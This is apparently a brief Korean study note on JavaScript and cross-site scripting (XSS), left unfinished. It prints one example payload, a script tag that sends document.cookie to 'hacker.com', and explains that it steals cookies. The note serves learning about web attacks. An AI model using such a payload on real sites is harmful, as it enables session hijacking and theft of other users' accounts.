2020. 7. 21. 02:23
XSS는 자바스크립트와 연관이 깊다.
여기서 자바스크립트란.
- 웹 애플리케이션에 사용되는 언어, 동적인 기능 구현(마우스를 가져가면 메뉴의 색깔이 변함).
- <script> 스크립트 코드 </script>와 같이 구현.
<script>document.location='http://hacker.com/cookie?'+document.cookie</script>쿠키를 빼올 때 사용하는 스크립트, document.cookie로 읽을 수 있고, document.location으로 외부로 보낼 수 있다.
XSS란.
- 크로스사이트스크립팅 공격은 자바 스크립트 같은 코드를 취약한 웹 에플리케이션을 이용하는 다른 사용자에게 전달하여 클라이언트 웹 브라우저를 공격하는 기법이다.
추가 필요.
